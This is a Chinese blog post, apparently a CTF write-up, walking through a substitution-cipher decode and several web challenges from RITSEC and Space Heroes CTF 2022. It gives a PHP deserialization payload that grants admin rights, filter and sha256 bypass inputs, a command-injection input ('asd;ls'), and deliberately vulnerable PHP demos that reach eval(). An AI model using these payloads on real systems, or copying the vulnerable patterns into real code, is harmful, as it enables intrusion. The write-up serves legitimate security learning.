<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="字符替换解码下载flag.txt得到 123456789101112EKSZJTCMXOQUDYLFABGPHNRVIW Mjbjhfly Ujcbeyz eblgj, rxpm e cbenj eyz gpepjui exb, eyz kblhcmp dj pmj kjjpujtbld e cuegg segj xy rmxsm xp reg jysulgjz. Xp reg e kjehpxt">
<meta property="og:type" content="article">
<meta property="og:title" content="4-7">
<meta property="og:url" content="http://example.com/2022/03/31/4-7/index.html">
<meta property="og:site_name" content="灵能对抗实验室">
<meta property="og:description" content="字符替换解码下载flag.txt得到 123456789101112EKSZJTCMXOQUDYLFABGPHNRVIW Mjbjhfly Ujcbeyz eblgj, rxpm e cbenj eyz gpepjui exb, eyz kblhcmp dj pmj kjjpujtbld e cuegg segj xy rmxsm xp reg jysulgjz. Xp reg e kjehpxt">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-03-31T02:40:01.000Z">
<meta property="article:modified_time" content="2022-04-06T10:27:10.668Z">
<meta property="article:author" content="hanbaiGG">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/03/31/4-7/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>4-7 | 灵能对抗实验室</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">灵能对抗实验室</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-resources">

    <a href="/resources/" rel="section"><i class="fa fa-download fa-fw"></i>资源</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/31/4-7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="hanbaiGG">
      <meta itemprop="description" content="为什么不拉弟弟一把呢">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="灵能对抗实验室">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          4-7
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-03-31 10:40:01" itemprop="dateCreated datePublished" datetime="2022-03-31T10:40:01+08:00">2022-03-31</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-04-06 18:27:10" itemprop="dateModified" datetime="2022-04-06T18:27:10+08:00">2022-04-06</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="字符替换解码"><a href="#字符替换解码" class="headerlink" title="字符替换解码"></a>字符替换解码</h2><p>下载flag.txt<br>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">EKSZJTCMXOQUDYLFABGPHNRVIW </span><br><span class="line"></span><br><span class="line">Mjbjhfly Ujcbeyz eblgj, rxpm e cbenj eyz gpepjui exb, eyz kblhcmp dj pmj kjjpuj</span><br><span class="line">tbld e cuegg segj xy rmxsm xp reg jysulgjz. Xp reg e kjehpxthu gsebekejhg, eyz, ep</span><br><span class="line">pmep pxdj, hyqylry pl yephbeuxgpg—lt slhbgj e cbjep fbxwj xy e gsxjypxtxs flxyp</span><br><span class="line">lt nxjr. Pmjbj rjbj prl blhyz kuesq gflpg yjeb lyj jvpbjdxpi lt pmj kesq, eyz e</span><br><span class="line">ulyc lyj yjeb pmj lpmjb. Pmj gseujg rjbj jvsjjzxycui mebz eyz culggi, rxpm euu pmj</span><br><span class="line">effjebeysj lt khbyxgmjz cluz. Pmj rjxcmp lt pmj xygjsp reg njbi bjdebqekuj, eyz,</span><br><span class="line">peqxyc euu pmxycg xypl slygxzjbepxly, X slhuz mebzui kuedj Ohfxpjb tlb mxg lfxyxly</span><br><span class="line">bjgfjspxyc xp.</span><br><span class="line"></span><br><span class="line">Pmj tuec xg: fxslSPT&#123;5HK5717H710Y_3N0UH710Y_59533E2J&#125;</span><br></pre></td></tr></table></figure>
<p>根据密钥key对文件解码得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">key=&#x27;EKSZJTCMXOQUDYLFABGPHNRVIW&#x27;</span><br><span class="line"></span><br><span class="line">aim=&#x27;Mjbjhfly Ujcbeyz eblgj, rxpm e cbenj eyz gpepjui exb, eyz kblhcmp dj pmj kjjpuj tbld e cuegg segj xy rmxsm xp reg jysulgjz. Xp reg e kjehpxthu gsebekejhg, eyz, ep pmep pxdj, hyqylry pl yephbeuxgpg—lt slhbgj e cbjep fbxwj xy e gsxjypxtxs flxyp lt nxjr. Pmjbj rjbj prl blhyz kuesq gflpg yjeb lyj jvpbjdxpi lt pmj kesq, eyz e ulyc lyj yjeb pmj lpmjb. Pmj gseujg rjbj jvsjjzxycui mebz eyz culggi, rxpm euu pmj effjebeysj lt khbyxgmjz cluz. Pmj rjxcmp lt pmj xygjsp reg njbi bjdebqekuj, eyz, peqxyc euu pmxycg xypl slygxzjbepxly, X slhuz mebzui kuedj Ohfxpjb tlb mxg lfxyxlybjgfjspxyc xp.&#x27;</span><br><span class="line">flag=&#x27;&#123;5HK5717H710Y_3N0UH710Y_59533E2J&#125;&#x27;</span><br><span class="line"></span><br><span class="line">for i in aim:</span><br><span class="line">    cnt=96</span><br><span class="line">    if(ord(i)&lt;64 or ord(i)&gt;133):</span><br><span class="line">        print(i,end=&quot;&quot;)</span><br><span class="line">    if(i==&quot;_&quot;):</span><br><span class="line">        print(i,end=&quot;&quot;)</span><br><span class="line">    for k in key:</span><br><span class="line">        cnt+=1</span><br><span class="line">        if(i==k or i==chr(ord(k)+97-65)):</span><br><span class="line">            print(chr(cnt),end=&quot;&quot;)</span><br><span class="line">        </span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h2 id="RITSECctf"><a href="#RITSECctf" class="headerlink" title="RITSECctf"></a>RITSECctf</h2><h3 id="web"><a href="#web" class="headerlink" title="web"></a>web</h3><h4 id="Pretty-Horrible-Program1"><a href="#Pretty-Horrible-Program1" class="headerlink" title="Pretty Horrible Program1"></a>Pretty Horrible Program1</h4><p>查看题目提供的源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset($_GET[&#x27;bingus&#x27;])) &#123;</span><br><span class="line">  $input = $_GET[&#x27;bingus&#x27;];</span><br><span class="line">  $to_replace = &#x27;bingus&#x27;;</span><br><span class="line">  $clean_string = preg_replace(&quot;/$to_replace/&quot;, &#x27;&#x27;, $input);</span><br><span class="line">  echo &quot;&lt;p&gt;Your string is: $clean_string&lt;/p&gt;&quot;;</span><br><span class="line">  if ($clean_string == $to_replace) &#123;</span><br><span class="line">    echo &quot;&lt;h2 class=\&quot;answer\&quot;&gt;Bingus &lt;span style=\&quot;color: green;\&quot;&gt;IS&lt;/span&gt; your beloved&lt;/h2&gt;&quot;;</span><br><span class="line">    output_flag();</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    echo &quot;&lt;h2 class=\&quot;answer\&quot;&gt;Bingus &lt;span style=\&quot;color: red;\&quot;&gt;IS NOT&lt;/span&gt; your beloved&lt;/h2&gt;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>输入<code>bingus</code>，替换字符中的关键字为空，但只有单此替换，使用重复字节绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bingbingusus</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h4 id="Pretty-Horrible-Program2"><a href="#Pretty-Horrible-Program2" class="headerlink" title="Pretty Horrible Program2"></a>Pretty Horrible Program2</h4><p>查看提供源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class User</span><br><span class="line">&#123;</span><br><span class="line">  public $role = &#x27;User&#x27;;</span><br><span class="line"></span><br><span class="line">  public function is_admin()</span><br><span class="line">  &#123;</span><br><span class="line">    if ($this-&gt;role == &#x27;Admin&#x27;) &#123;</span><br><span class="line">      return true;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">      return false;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  public function __sleep()</span><br><span class="line">  &#123;</span><br><span class="line">    return array($this-&gt;role);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">if (isset($_COOKIE[&#x27;user&#x27;])) &#123;</span><br><span class="line">  echo &quot;&lt;p&gt;Output:&lt;br/&gt;&quot; . $_COOKIE[&#x27;user&#x27;] . &#x27;&lt;/p&gt;&#x27;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">  echo &#x27;Please provide some input.&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">if (isset($_COOKIE[&#x27;user&#x27;])) &#123;</span><br><span class="line">  try &#123;</span><br><span class="line">    $user = unserialize($_COOKIE[&#x27;user&#x27;]);</span><br><span class="line">    if ($user-&gt;is_admin()) &#123;</span><br><span class="line">      echo &#x27;&lt;h3 class=&quot;success&quot;&gt;Welcome Admin&lt;/h3&gt;&#x27;;</span><br><span class="line">      output_flag();</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">      echo &#x27;&lt;h3 class=&quot;error&quot;&gt;Not Admin&lt;/h3&gt;&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; catch (Error $e) &#123;</span><br><span class="line">    echo &#x27;&lt;h2 class=&quot;error&quot;&gt;Uh oh, ur input was &lt;code&gt;cringe&lt;/code&gt;&lt;/h2&gt;&#x27;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>PHP反序列化漏洞<em>不知道为什么直接生成的脚本没有变量名</em><br>构造payload<br><code> O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;Admin&quot;;&#125;</code><br>得到flag。RS{C3re4l_B1ngu5}</p>
<h4 id="Pretty-Horrible-Program3"><a href="#Pretty-Horrible-Program3" class="headerlink" title="Pretty Horrible Program3"></a>Pretty Horrible Program3</h4><p>查看提供的源码<br>sha256绕过，<br>使用数组绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php3?input1[]=1&amp;input2[]=2</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h4 id="Really-Cool-Encryption"><a href="#Really-Cool-Encryption" class="headerlink" title="Really Cool Encryption"></a>Really Cool Encryption</h4><p>input存在任意命令执行漏洞<br><code>input=asd;ls</code>查看目录，得到base64加密的回显<br>尝试catflag，失败<br>发现存在<code>dockerfile</code><br>cat dockerfile，恢复image</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -p80:80 youngbaofeng/google-image-search-pertext</span><br><span class="line">得到flag</span><br></pre></td></tr></table></figure>
<h2 id="Space-Heroes-CTF-2022"><a href="#Space-Heroes-CTF-2022" class="headerlink" title="Space Heroes CTF 2022"></a>Space Heroes CTF 2022</h2><h3 id="web-1"><a href="#web-1" class="headerlink" title="web"></a>web</h3><h4 id="R2D2"><a href="#R2D2" class="headerlink" title="R2D2"></a>R2D2</h4><p>打开网址<br>一张星球大战两个机器人的照片，<br>盲猜和<code>robots.txt</code>有关<br>打开后直接获得flag。</p>
<h4 id="Space-traveler"><a href="#Space-traveler" class="headerlink" title="Space traveler"></a>Space traveler</h4><p>打开网页，提示查看js脚本<br>获得源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">var _0xb645 = [&quot;\x47\x75\x65\x73\x73\x20\x54\x68\x65\x20\x46\x6C\x61\x67&quot;, &quot;\x73\x68\x63\x74\x66\x7B\x66\x6C\x61\x67\x7D&quot;, &quot;\x59\x6F\x75\x20\x67\x75\x65\x73\x73\x65\x64\x20\x72\x69\x67\x68\x74\x2E&quot;, &quot;\x73\x68\x63\x74\x66\x7B\x65\x69\x67\x68\x74\x79\x5F\x73\x65\x76\x65\x6E\x5F\x74\x68\x6F\x75\x73\x61\x6E\x64\x5F\x6D\x69\x6C\x6C\x69\x6F\x6E\x5F\x73\x75\x6E\x73\x7D&quot;, &quot;\x59\x6F\x75\x20\x67\x75\x65\x73\x73\x65\x64\x20\x77\x72\x6F\x6E\x67\x2E&quot;, &quot;\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C&quot;, &quot;\x64\x65\x6D\x6F&quot;, &quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;];</span><br><span class="line"></span><br><span class="line">function myFunction() &#123;</span><br><span class="line">    let _0xb729x2;</span><br><span class="line">    let _0xb729x3 = prompt(_0xb645[0], _0xb645[1]);</span><br><span class="line">    switch (_0xb729x3) &#123;</span><br><span class="line">        case _0xb645[3]:</span><br><span class="line">            _0xb729x2 = _0xb645[2];</span><br><span class="line">            break;</span><br><span class="line">        default:</span><br><span class="line">            _0xb729x2 = _0xb645[4]</span><br><span class="line">    &#125;;</span><br><span class="line">    document[_0xb645[7]](_0xb645[6])[_0xb645[5]] = _0xb729x2</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>js前端代码混淆，应该是ob混淆<br>尝试复原<br>在线解码网页<br><code>https://deobfuscate.io/</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">function myFunction() &#123;</span><br><span class="line">  let azante;</span><br><span class="line">  let karynna = prompt(&quot;Guess The Flag&quot;, &quot;shctf&#123;flag&#125;&quot;);</span><br><span class="line">  switch (karynna) &#123;</span><br><span class="line">    case &quot;shctf&#123;eighty_seven_thousand_million_suns&#125;&quot;:</span><br><span class="line">      azante = &quot;You guessed right.&quot;;</span><br><span class="line">      break;</span><br><span class="line">    default:</span><br><span class="line">      azante = &quot;You guessed wrong.&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  ;</span><br><span class="line">  document.getElementById(&quot;demo&quot;).innerHTML = azante;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h2 id="反序列化demo"><a href="#反序列化demo" class="headerlink" title="反序列化demo"></a>反序列化demo</h2><h3 id="demo1"><a href="#demo1" class="headerlink" title="demo1"></a>demo1</h3><p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">  error_reporting(<span class="number">0</span>); <span class="comment">//关闭错误报告</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">happy</span></span>&#123; </span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$file</span>=<span class="string">&#x27;demo1.php&#x27;</span>; </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123; </span><br><span class="line">            <span class="keyword">$this</span>-&gt;file=<span class="variable">$file</span>; </span><br><span class="line">        &#125; </span><br><span class="line">         </span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123; <span class="comment">//该函数会在类的一个对象被删除时自动调用</span></span><br><span class="line">            <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;file))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span>(strchr(<span class="keyword">$this</span>-&gt;file,<span class="string">&quot;\\&quot;</span>)===<span class="literal">false</span> &amp;&amp; strchr(<span class="keyword">$this</span>-&gt;file,<span class="string">&#x27;/&#x27;</span>)===<span class="literal">false</span>) <span class="comment">//过滤了文件名中的\\与/</span></span><br><span class="line">                    show_source(dirname(<span class="keyword">__FILE__</span>).<span class="string">&#x27;/&#x27;</span>.<span class="keyword">$this</span>-&gt;file); <span class="comment">//打开文件操作</span></span><br><span class="line">                <span class="keyword">else</span></span><br><span class="line">                    <span class="keyword">die</span>(<span class="string">&#x27;Wrong filename.&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; </span><br><span class="line">         </span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123; </span><br><span class="line">            <span class="keyword">$this</span>-&gt;file=<span class="string">&#x27;demo1.php&#x27;</span>; </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"> &#125;</span><br><span class="line">      </span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]))&#123; </span><br><span class="line">        show_source(<span class="string">&#x27;demo1.php&#x27;</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span>&#123; </span><br><span class="line">        <span class="variable">$file</span>=base64_decode(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]); </span><br><span class="line">        <span class="keyword">echo</span> unserialize(<span class="variable">$file</span>); </span><br><span class="line">        &#125; </span><br><span class="line"><span class="meta">?&gt;</span> </span><br><span class="line">&lt;!--password in flag.php--&gt; </span><br></pre></td></tr></table></figure>
<p>wakeup魔术方法绕过<br>通过更改序列化后的数字标识绕过<br>获得flag</p>
<h3 id="DEMO2"><a href="#DEMO2" class="headerlink" title="DEMO2"></a>DEMO2</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="string">&#x27;demo2.php&#x27;</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test1</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$varr</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;varr = <span class="string">&quot;demo2.php&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(file_exists(<span class="keyword">$this</span>-&gt;varr))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br /&gt;文件&quot;</span>.<span class="keyword">$this</span>-&gt;varr.<span class="string">&quot;存在&lt;br /&gt;&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test2</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$varr</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$obj</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;varr=<span class="string">&#x27;123456&#x27;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;obj=<span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;obj-&gt;execute();</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;varr;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br /&gt;这是f2的析构函数&lt;br /&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test3</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$varr</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">execute</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;varr);</span><br><span class="line">    &#125;</span><br><span class="line">    